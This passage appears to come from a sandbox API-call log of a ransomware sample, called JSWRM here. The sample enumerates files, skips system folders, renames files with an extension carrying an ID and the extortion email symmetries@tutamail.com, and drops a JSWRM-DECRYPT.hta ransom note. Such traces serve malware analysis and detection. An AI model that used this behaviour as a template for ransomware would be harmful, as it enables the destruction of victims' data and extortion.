cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0068.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0068.070] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 0 [0068.070] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0068.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0068.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.071] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2=".") returned 1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="..") returned 1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="...") returned 1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="windows") returned -1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="recovery") returned -1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="perflogs") returned -1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="documents and settings") returned 1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="system volume information") returned -1 [0068.071] lstrcmpiW (lpString1="keypad.xml", lpString2="msocache") returned -1 [0068.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypad.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypad.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keypad.xml", lpUsedDefaultChar=0x0) returned 10 [0068.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypad.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypad.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keypad.xml", lpUsedDefaultChar=0x0) returned 10 [0068.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.072] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10081696995333256) returned 0 [0068.072] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.073] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.073] CloseHandle (hObject=0xffffffff) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0068.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0068.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.073] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="main", cAlternateFileName="")) returned 1 [0068.073] lstrcmpiW (lpString1="main", lpString2=".") returned 1 [0068.074] lstrcmpiW (lpString1="main", lpString2="..") returned 1 [0068.074] lstrcmpiW (lpString1="main", lpString2="...") returned 1 [0068.074] lstrcmpiW (lpString1="main", lpString2="windows") returned -1 [0068.074] lstrcmpiW (lpString1="main", lpString2="recovery") returned -1 [0068.074] lstrcmpiW (lpString1="main", lpString2="perflogs") returned -1 [0068.074] lstrcmpiW (lpString1="main", lpString2="documents and settings") returned 1 [0068.074] lstrcmpiW (lpString1="main", lpString2="$RECYCLE.BIN") returned 1 [0068.074] lstrcmpiW (lpString1="main", lpString2="system volume information") returned -1 [0068.074] lstrcmpiW (lpString1="main", lpString2="msocache") returned -1 [0068.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0068.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0068.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\jswrm-decrypt.hta")) returned 0xffffffff [0068.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0068.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.078] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.078] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.079] CloseHandle (hObject=0x458) returned 1 [0068.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0068.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21fab8 [0068.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f1c60 [0068.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\jswrm-decrypt.hta")) returned 0x20 [0068.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.080] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f3cc05b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0068.080] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.080] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f3cc05b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.081] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.081] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.081] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd05, dwReserved0=0x0, dwReserved1=0x0, cFileName="base.xml", cAlternateFileName="")) returned 1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2=".") returned 1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="..") returned 1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="...") returned 1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="windows") returned -1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="recovery") returned -1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="perflogs") returned -1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="documents and settings") returned -1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="system volume information") returned -1 [0068.081] lstrcmpiW (lpString1="base.xml", lpString2="msocache") returned -1 [0068.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base.xml", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base.xml", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base.xml", lpUsedDefaultChar=0x0) returned 8 [0068.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base.xml", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base.xml", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base.xml", lpUsedDefaultChar=0x0) returned 8 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.082] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10089634094897944) returned 0 [0068.082] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.082] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.082] CloseHandle (hObject=0xffffffff) returned 1 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0068.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0068.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0068.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.082] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0068.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.083] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0068.083] lstrcmpiW 